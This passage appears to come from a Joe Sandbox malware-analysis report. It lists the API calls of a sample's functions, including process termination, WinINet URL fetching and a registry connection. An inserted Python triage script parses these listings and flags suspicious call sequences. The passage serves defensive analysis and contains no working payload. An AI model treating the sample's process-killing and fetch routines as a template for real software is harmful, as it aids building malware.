                          • Instruction Fuzzy Hash: CA41B671204B019FDB20DF28C884F5AB7E4EF84314F04469EF955972D2D770DA01DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00B60478
                            • Part of subcall function 00B07F40: _memmove.LIBCMT ref: 00B07F8F
                            • Part of subcall function 00B0A2FB: _memmove.LIBCMT ref: 00B0A33D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2411302734-567219261
                          • Opcode ID: 4680e669d8668bac0f037de5f25642f873a68c723256bbfc396ecdb9df1fe413
                          • Instruction ID: 23386b73e51ba7f24f022ab32aa313570c4a5ccf06612b9d31a2b649741b2070
                          • Opcode Fuzzy Hash: 4680e669d8668bac0f037de5f25642f873a68c723256bbfc396ecdb9df1fe413
                          • Instruction Fuzzy Hash: 5B31AB7551061AABCF10EF58C881AFEB7F4FF25310B108AA9A822A72D5CB71E905CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B3C684
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B3C697
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B3C6C7
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 458670788-1403004172
                          • Opcode ID: db89e514b5bb44e8fb3734c33299f0d16a00f6ff8de427e8ba1ebf6304a77ec5
                          • Instruction ID: 6457e0a7cb69be892ef6a55d145b66f57f867ed25932fbf9f1b6c042738e6310
                          • Opcode Fuzzy Hash: db89e514b5bb44e8fb3734c33299f0d16a00f6ff8de427e8ba1ebf6304a77ec5
                          • Instruction Fuzzy Hash: 9621DD71A00108AFDB14ABA4DC86DFFBBE8DF46350F20469AF426E71E1DB74590A9760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B54A60
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B54A86
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B54AB6
                          • InternetCloseHandle.WININET(00000000), ref: 00B54AFD
                            • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          • Opcode ID: 0be605ee01e50f94735972a52b3724f7e946ff941a9b198f749ec34640190cbc
                          • Instruction ID: 130c5192db5dac01ae32e621b58b5f7d2d030beebaa3c49c80114d71428c9db8
                          • Opcode Fuzzy Hash: 0be605ee01e50f94735972a52b3724f7e946ff941a9b198f749ec34640190cbc
                          • Instruction Fuzzy Hash: C021CCB9540608BEEB12DB649CC4FBBB7ECEB8874AF00009AF90593150EB608D499B70
                          Uniqueness

                          Uniqueness Score: -1.00%
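The two listings above that matter most for triage are the window-kill routine (WM_CLOSE via PostMessageW and SendMessageTimeoutW, then GetWindowThreadProcessId, OpenProcess with 0x1F0FFF and TerminateProcess, which is how AutoIt's WinKill behaves) and the WinINet routine (InternetOpenUrlW, HttpSendRequestW, then HttpQueryInfoW with info level 5, a Content-Length probe). The plugin prints raw hex for every constant and pads each call with stack slots beyond the API's real parameter count, so reading these by eye is error-prone. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly the "APIs" format shown on this page, trims the padding using a parameter-count table, names the Win32 constants the arguments encode, and flags the two call orderings. The arity table, the constant names and the rule names are this script's own; the two sample inputs are the report's lines copied verbatim.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.

Parses the report's bullet lines, discards the stack noise the IDA plugin prints
past an API's real parameter count, names the Win32 constants the arguments
encode, and flags call orderings worth a second look. Added example; ARITY,
CONSTANTS and SEQUENCES are this script's own tables, not report data.
"""
import re
from dataclasses import dataclass

CALL_RE = re.compile(
    r"(?P<api>[\w:@]+)\.(?P<module>\w+)"      # e.g. OpenProcess.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"               # optional (arg,arg,...) list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"       # call-site address
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Real parameter counts; whatever the plugin prints past these is stack noise.
ARITY = {
    "PostMessageW": 4, "SendMessageTimeoutW": 7, "SendMessageW": 4,
    "GetWindowThreadProcessId": 2, "OpenProcess": 3, "TerminateProcess": 2,
    "CloseHandle": 1, "InternetOpenUrlW": 6, "HttpSendRequestW": 5,
    "HttpQueryInfoW": 5, "InternetCloseHandle": 1, "MapVirtualKeyW": 2,
    "CreateFileW": 7, "CreatePipe": 4, "GetStdHandle": 1,
    "WaitForSingleObject": 2, "TerminateThread": 2,
}

# (api, zero-based argument index) -> {numeric value: Win32 constant name}
CONSTANTS = {
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("SendMessageW", 1): {0x30: "WM_SETFONT", 0x188: "LB_GETCURSEL",
                          0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN",
                          0x467: "ACM_OPENW"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("HttpQueryInfoW", 1): {5: "HTTP_QUERY_CONTENT_LENGTH"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
    ("MapVirtualKeyW", 1): {0: "MAPVK_VK_TO_VSC"},
    ("CreateFileW", 1): {0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 4): {3: "OPEN_EXISTING"},
}

# Ordered API subsequences (gaps allowed) that deserve a closer look.
SEQUENCES = {
    "kill-window-owner-process": ["GetWindowThreadProcessId", "OpenProcess",
                                  "TerminateProcess"],
    "wininet-fetch-with-size-probe": ["InternetOpenUrlW", "HttpSendRequestW",
                                      "HttpQueryInfoW"],
}

# Constructed inputs: the report's own lines for the two functions, copied verbatim.
KILL_SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B48504
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4851A
• GetWindowThreadProcessId.USER32(?,?), ref: 00B48529
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48538
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48542
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48549
"""
WININET_SAMPLE = """\
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B54A60
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B54A86
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B54AB6
• InternetCloseHandle.WININET(00000000), ref: 00B54AFD
  • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
"""


@dataclass
class Call:
    api: str
    module: str
    args: list      # int for 8-hex-digit words, str for '?' or literals such as nul
    ref: str
    subcall: bool   # True for "Part of subcall function" lines


def parse_api_lines(text):
    """Turn the report's bullet lines into Call records; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        args = [int(a, 16) if HEX_RE.match(a) else a for a in raw]
        args = args[: ARITY.get(m.group("api"), len(args))]   # drop stack noise
        calls.append(Call(m.group("api"), m.group("module"), args,
                          m.group("ref").upper(), "Part of subcall" in line))
    return calls


def annotate(call):
    """Return the constant names a call's arguments encode (e.g. 0x1F0FFF -> PROCESS_ALL_ACCESS)."""
    names = []
    for i, a in enumerate(call.args):
        table = CONSTANTS.get((call.api, i))
        if table and isinstance(a, int) and a in table:
            names.append(table[a])
    return names


def match_sequences(calls):
    """Names of every SEQUENCES rule whose APIs occur in order among the function's own calls."""
    apis = [c.api for c in calls if not c.subcall]
    hits = []
    for name, wanted in SEQUENCES.items():
        pos = 0
        for api in apis:
            if api == wanted[pos]:
                pos += 1
                if pos == len(wanted):
                    hits.append(name)
                    break
    return hits


if __name__ == "__main__":
    for text in (KILL_SAMPLE, WININET_SAMPLE):
        calls = parse_api_lines(text)
        for c in calls:
            print(f"{c.ref} {c.api}.{c.module} {annotate(c)}")
        print("rules fired:", match_sequences(calls))
```

The parameter-count table is the important part: OpenProcess takes three arguments, so everything after 001F0FFF,00000000,? in the report line is whatever happened to be on the stack, and must not be read as data the function passed. Subcall lines are parsed but excluded from sequence matching, since they belong to a callee, not to the function being described.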

                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B7454E
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _memset.LIBCMT ref: 00B03965
                          • _wcscpy.LIBCMT ref: 00B039B5
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B039C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 3942752672-1585850449
                          • Opcode ID: d8182ed7dd5671f7de4ef08c05d84f055304bee3637e545365359104b95f6dd6
                          • Instruction ID: a9f13eaa00a9c731eda8ca0958dea3d71e518c714f1c48c6bcdb9d863ea0ad6a
                          • Opcode Fuzzy Hash: d8182ed7dd5671f7de4ef08c05d84f055304bee3637e545365359104b95f6dd6
                          • Instruction Fuzzy Hash: 6E31A171408340ABD721EB64DC49FDB7BECEB59710F44499AF18A931E1DF70AA48CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B68F69
                          • LoadLibraryW.KERNEL32(?), ref: 00B68F70
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B68F85
                          • DestroyWindow.USER32(?), ref: 00B68F8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: 977b14b5aead96236005a3242193907333439d9e71f47c8991d4c061ddd20fe5
                          • Instruction ID: 7cd2e48feedf9f3a82181e8b86367072595bddcb06423254ba88167ae73d03f2
                          • Opcode Fuzzy Hash: 977b14b5aead96236005a3242193907333439d9e71f47c8991d4c061ddd20fe5
                          • Instruction Fuzzy Hash: F0219D71200205AFEF105E64DC90EBB3BEAEB59324F104B69FA54971A1DB75DC5097A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00B49E85
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B49EB6
                          • GetStdHandle.KERNEL32(0000000C), ref: 00B49EC8
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B49F02
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: 5f291686565f4c1e53227dd061f84644785c29c59e3e31cd0227715eee59af5d
                          • Instruction ID: 71102c0b5f7de29fd75175d36316cbf29c5788d852bb3a1c18c0a43c61b0d961
                          • Opcode Fuzzy Hash: 5f291686565f4c1e53227dd061f84644785c29c59e3e31cd0227715eee59af5d
                          • Instruction Fuzzy Hash: B3215E70640305ABDB20DF29DC45A9B7BF4EF84720F204A99F8A5D72E0DB70DA48EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4E392
                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00B4E3E6
                          • __swprintf.LIBCMT ref: 00B4E3FF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B9DBF0), ref: 00B4E43D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: cb735c0ff7489a61b96c6c2f254d7643b6c8490e16b8346eeb5883aca84f4866
                          • Instruction ID: b63bf0537663e15106c3bce3c4c7f3d36b91bc23c02bba162b1e6fb6ca0f96ab
                          • Opcode Fuzzy Hash: cb735c0ff7489a61b96c6c2f254d7643b6c8490e16b8346eeb5883aca84f4866
                          • Instruction Fuzzy Hash: 2F216D35A40108AFCB10EFA4C885EAEBBF8EF49710B1040A9F509E72A1DB31DA05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                            • Part of subcall function 00B3D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3D640
                            • Part of subcall function 00B3D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3D653
                            • Part of subcall function 00B3D623: GetCurrentThreadId.KERNEL32 ref: 00B3D65A
                            • Part of subcall function 00B3D623: AttachThreadInput.USER32(00000000), ref: 00B3D661
                          • GetFocus.USER32 ref: 00B3D7FB
                            • Part of subcall function 00B3D66C: GetParent.USER32(?), ref: 00B3D67A
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3D844
                          • EnumChildWindows.USER32(?,00B3D8BA), ref: 00B3D86C
                          • __swprintf.LIBCMT ref: 00B3D886
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          • Opcode ID: a938018a1bcda1620c411927d0cf430a7efec90ee3c11b8cfc448c5e59b3a46a
                          • Instruction ID: 834a3e093cbaec8ca1776af7c08c53e2ebfe64b3ce71856be5defbf23fd6b8ae
                          • Opcode Fuzzy Hash: a938018a1bcda1620c411927d0cf430a7efec90ee3c11b8cfc448c5e59b3a46a
                          • Instruction Fuzzy Hash: 1211A2719002096BDF11BF60EC86FEA37ADAB44704F1040F6B919AA196DFB4A945CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B9DBF0), ref: 00B5BBA1
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B9DBF0), ref: 00B5BBD5
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B5BD33
                          • SysFreeString.OLEAUT32(?), ref: 00B5BD5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          • Opcode ID: 1b2466731fd436c608ccfbb3d94904f55d804ec7b9630ee7ad3765ff7c54b94b
                          • Instruction ID: c66953a50c6b6e7bb42ea54ba395a26c2eacf1203eb969d6aacb6a095e34a2ba
                          • Opcode Fuzzy Hash: 1b2466731fd436c608ccfbb3d94904f55d804ec7b9630ee7ad3765ff7c54b94b
                          • Instruction Fuzzy Hash: D6F10775A00209EFCB04DFA4C884EAEB7B9FF89315F1485D9F905AB250DB71AE46CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B618E4
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B61917
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B61A3A
                          • CloseHandle.KERNEL32(?), ref: 00B61AB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: f7be954159d96cd9cbb733d3d6574fc83b092ddc71c8e71f0e987cbaf5973cf0
                          • Instruction ID: b4c65a8122c95514905eb406e592fd413d9af18828f9258e00b35da32f45e405
                          • Opcode Fuzzy Hash: f7be954159d96cd9cbb733d3d6574fc83b092ddc71c8e71f0e987cbaf5973cf0
                          • Instruction Fuzzy Hash: E6817174A41204ABDF109F68C886BAD7BE5EF44720F588499F915AF3C2D7B8E9408F90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B605DF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6066E
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B6068C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B606D2
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B606EC
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          • Opcode ID: 822265c2707d823009733688cfe63cc6e54ec003a289c74d0916d49ca8d8d10b
                          • Instruction ID: caef21b03735d6614bec07b98a7f53e5fa12fe776eeb8b99596f37bbd77f83a5
                          • Opcode Fuzzy Hash: 822265c2707d823009733688cfe63cc6e54ec003a289c74d0916d49ca8d8d10b
                          • Instruction Fuzzy Hash: CF515C75A00205DFCB00EFA8C4949AEBBF5FF58310B1481A5E956AB392DB34ED45CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62DE0
